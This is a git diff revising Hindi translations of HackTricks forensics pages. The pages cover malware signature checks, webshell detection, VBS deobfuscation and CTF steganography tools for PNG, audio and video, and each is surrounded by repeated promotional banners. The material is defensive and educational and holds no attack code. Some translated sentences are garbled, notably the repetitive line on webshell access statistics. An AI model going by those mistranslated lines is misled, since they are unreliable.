[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम प्रयास करता है कि **छिपे हुए**/**अविश्वसनीय कोड** को खोजें जैसे कि फ़ाइलें जो **मैलवेयर**/वेबशैल में अक्सर उपयोग की जाने वाली **PHP** फ़ंक्शन्स का उपयोग कर रही हों।
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) अपनी सर्वोत्तम कोशिश करता है कि **obfuscated**/**dodgy code** और फ़ाइलों की पहचान करें जो अक्सर **malwares**/webshells में उपयोग की जाने वाली **PHP** functions का उपयोग करती हैं।
|
||||
|
||||
### Apple Binary Signatures
|
||||
|
||||
किसी **मैलवेयर नमूने** की जांच करते समय आपको हमेशा बाइनरी के **सिग्नेचर** की जांच करनी चाहिए क्योंकि उस **डेवलपर** को जिसने इसे साइन किया हो, पहले से ही **मैलवेयर** से **संबंधित** हो सकता है।
|
||||
किसी **malware sample** की जांच करते समय आपको हमेशा बाइनरी के **signature** की जांच करनी चाहिए क्योंकि उस **developer** को जिसने इसे साइन किया हो संबंधित हो सकता है **malware** के साथ।
|
||||
```bash
|
||||
#Get signer
|
||||
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
|
||||
|
@ -149,16 +150,16 @@ codesign --verify --verbose /Applications/Safari.app
|
|||
#Check if the signature is valid
|
||||
spctl --assess --verbose /Applications/Safari.app
|
||||
```
|
||||
## पहचान तकनीकें
|
||||
## डिटेक्शन तकनीक
|
||||
|
||||
### फ़ाइल स्टैकिंग
|
||||
|
||||
अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की एक फ़ोल्डर **कोई निश्चित तारीख** को **अपडेट किया गया था**। **जांचें** कि **वेब सर्वर की सभी फ़ाइलें कब बनाई और संशोधित** की गई थीं और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें।
|
||||
अगर आपको पता है कि किसी वेब सर्वर के **फ़ाइलें** की एक फ़ोल्डर **कोई तारीख** पर **अंतिम बार अपडेट की गई थी**। **जांचें** कि **वेब सर्वर की सभी फ़ाइलें कब बनाई और संशोधित** की गई थीं और यदि कोई तारीख **संदिग्ध** है, तो उस फ़ाइल की जांच करें।
|
||||
|
||||
### बेसलाइन्स
|
||||
|
||||
अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** वालों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा।
|
||||
अगर किसी फ़ोल्डर की फ़ाइलें **संशोधित नहीं होनी चाहिए**, तो आप फ़ोल्डर की **मौलिक फ़ाइलों** का **हैश** निकाल सकते हैं और उन्हें **वर्तमान** फ़ाइलों के साथ **तुलना** कर सकते हैं। कुछ भी संशोधित होने पर **संदिग्ध** होगा।
|
||||
|
||||
### सांख्यिकीय विश्लेषण
|
||||
|
||||
जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में एक** शामिल हो सकता है।
|
||||
जब जानकारी लॉग में सहेजी जाती है तो आप **जांच सकते हैं कि वेब सर्वर की प्रत्येक फ़ाइल का कितनी बार एक्सेस किया गया था क्योंकि एक वेब शैल में एक वेब शैल सबसे अधिक हो सकता है**।
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
यहाँ आप विशेष फ़ाइल प्रकार और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं:
|
||||
यहाँ आप विशेष फ़ाइल प्रकारों और/या सॉफ़्टवेयर के लिए दिलचस्प ट्रिक्स पा सकते हैं:
|
||||
|
||||
{% page-ref page=".pyc.md" %}
|
||||
|
||||
|
@ -37,16 +38,17 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित करना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,19 +1,20 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
कुछ ऐसी चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफस्केट करने में उपयोगी हो सकती हैं:
|
||||
कुछ चीजें जो एक दुष्ट VBS फ़ाइल को डीबग/डीओबफ़स्केट करने में उपयोगी हो सकती हैं:
|
||||
|
||||
## echo
|
||||
```bash
|
||||
|
@ -52,16 +53,17 @@ End With
|
|||
|
||||
End Function
|
||||
```
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
दूसरे तरीके HackTricks का समर्थन करने के लिए:
|
||||
|
||||
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह **The PEASS Family** की खोज करें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें** PRs को **HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,33 +1,35 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
|
||||
</details>
|
||||
|
||||
**PNG फ़ाइलें** **CTF challenges** में अपनी **हानि रहित संपीड़न** के लिए प्रशंसित हैं, जिससे वे छिपी हुई डेटा को एम्बेड करने के लिए आदर्श होती हैं। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा का विश्लेषण करके, छिपे हुए जानकारी या असमान्यताएँ प्रकट करते हैं।
|
||||
|
||||
PNG फ़ाइल की अखंडता की जाँच और क्षति को ठीक करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) जैसी ऑनलाइन सेवाएँ एक वेब-आधारित समाधान प्रदान करती हैं **क्षतिग्रस्त PNGs को मरम्मत करने** में, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं।
|
||||
|
||||
ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छिपे या खोए गए डेटा का पता लगाने और पुनर्प्राप्त करने में मदद करती हैं।
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 **शामिल हों** [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** को [**पीआर जमा करके**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**PNG फ़ाइलें** **CTF चैलेंज** में अपने **लॉसलेस कंप्रेशन** के लिए प्रशंसित हैं, जिन्हें छुपी डेटा को एम्बेड करने के लिए आदर्श बनाता है। **Wireshark** जैसे उपकरण PNG फ़ाइलों का विश्लेषण करने की संभावना प्रदान करते हैं, जो नेटवर्क पैकेट्स के भीतर उनके डेटा को विश्लेषित करके, छुपे जानकारी या विसंगतियों को प्रकट करते हैं।
|
||||
|
||||
PNG फ़ाइल की अखंडता की जाँच करने और क्षति को मरम्मत करने के लिए, **pngcheck** एक महत्वपूर्ण उपकरण है, जो PNG फ़ाइलों की मान्यता और निदान करने के लिए कमांड-लाइन कार्यक्षमता प्रदान करता है ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). जब फ़ाइलें साधारण सुधारों से परे होती हैं, तो [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) जैसी ऑनलाइन सेवाएं एक वेब-आधारित समाधान प्रदान करती हैं **क्षतिग्रस्त PNG की मरम्मत के लिए**, CTF प्रतिभागियों के लिए महत्वपूर्ण डेटा की पुनर्प्राप्ति में सहायक होती हैं।
|
||||
|
||||
ये रणनीतियाँ CTFs में एक व्यापक दृष्टिकोण की महत्वता को दर्शाती हैं, जो विश्लेषणात्मक उपकरणों और मरम्मत तकनीकों का मिश्रण उपयोग करके छुपे या खोए गए डेटा का पता लगाने और पुनर्प्राप्ति करने में मदद करती हैं।
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और अभ्यास करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 **शामिल हों** [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** को [**पीआर जमा करके**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,40 +1,14 @@
|
|||
<details>
|
||||
{% hint style="success" %}
|
||||
**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** एक महत्वपूर्ण तकनीक है **CTF फोरेंसिक्स चैलेंजेस** में, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग करके गुप्त संदेश छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं।
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
ऑडियो चैलेंज के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण करने के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ का पता लगाने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गाने को धीमा करना या उलटा करना छिपे संदेश का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है।
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
**लीस्ट सिग्निफिकेंट बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का उपयोग करके डेटा को गुप्त रूप से समाहित करता है। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है।
|
||||
|
||||
* अगर आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
वीडियो चैलेंज अक्सर ऑडियो और वीडियो स्ट्रीम्स को बंडल करने वाले कंटेनर फ़ॉर्मेट्स को शामिल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेट्स का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है।
|
||||
|
||||
</details>
|
||||
यह उपकरणों का समूह CTF चैलेंज में आवश्यक विविधता को दर्शाता है, जहां प्रतिभागी को ऑडियो और वीडियो फ़ाइलों में छिपे डेटा को खोलने के लिए विश्लेषण और मेनिपुलेशन तकनीकों का एक व्यापक विस्तार उपयोग करना होता है।
|
||||
|
||||
**ऑडियो और वीडियो फ़ाइल मेनिपुलेशन** **CTF फोरेंसिक्स चैलेंजेस** में एक महत्वपूर्ण तकनीक है, **स्टेगेनोग्राफी** और मेटाडेटा विश्लेषण का उपयोग गुप्त संदेश छुपाने या प्रकट करने के लिए। **[mediainfo](https://mediaarea.net/en/MediaInfo)** और **`exiftool`** जैसे उपकरण फ़ाइल मेटाडेटा की जांच करने और सामग्री प्रकारों की पहचान के लिए आवश्यक हैं।
|
||||
|
||||
ऑडियो चैलेंजों के लिए, **[Audacity](http://www.audacityteam.org/)** एक प्रमुख उपकरण है जो वेवफ़ॉर्म देखने और स्पेक्ट्रोग्राम विश्लेषण के लिए महत्वपूर्ण है, जो ऑडियो में एन्कोड किए गए पाठ का पता लगाने के लिए आवश्यक है। **[Sonic Visualiser](http://www.sonicvisualiser.org/)** विस्तृत स्पेक्ट्रोग्राम विश्लेषण के लिए अत्यधिक अनुशंसित है। **Audacity** ऑडियो मेनिपुलेशन की अनुमति देता है जैसे गानों को धीमा करना या उलटना छुपे संदेश का पता लगाने के लिए। **[Sox](http://sox.sourceforge.net/)**, एक कमांड लाइन यूटिलिटी, ऑडियो फ़ाइलों को परिवर्तित और संपादित करने में उत्कृष्ट है।
|
||||
|
||||
**कम सार्वजनिक बिट्स (LSB)** मेनिपुलेशन ऑडियो और वीडियो स्टेगेनोग्राफी में एक सामान्य तकनीक है, जो मीडिया फ़ाइलों के निश्चित आकार के टुकड़ों का उपयोग गुप्त रूप से डेटा समाहित करने के लिए करता है। **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** DTMF टोन्स या मोर्स कोड के रूप में छिपे संदेशों को डिकोड करने के लिए उपयोगी है।
|
||||
|
||||
वीडियो चैलेंज अक्सर कंटेनर फ़ॉर्मेट का सामाग्री जोड़ने वाले होते हैं जो ऑडियो और वीडियो स्ट्रीम्स को बंडल करते हैं। **[FFmpeg](http://ffmpeg.org/)** इन फॉर्मेटों का विश्लेषण और मेनिपुलेशन करने के लिए जानकार है, जो डी-मल्टिप्लेक्सिंग और सामग्री को प्लेबैक करने की क्षमता रखता है। डेवलपर्स के लिए, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg की क्षमताओं को पायथन में उन्नत scriptable इंटरेक्शन के लिए एकीकृत करता है।
|
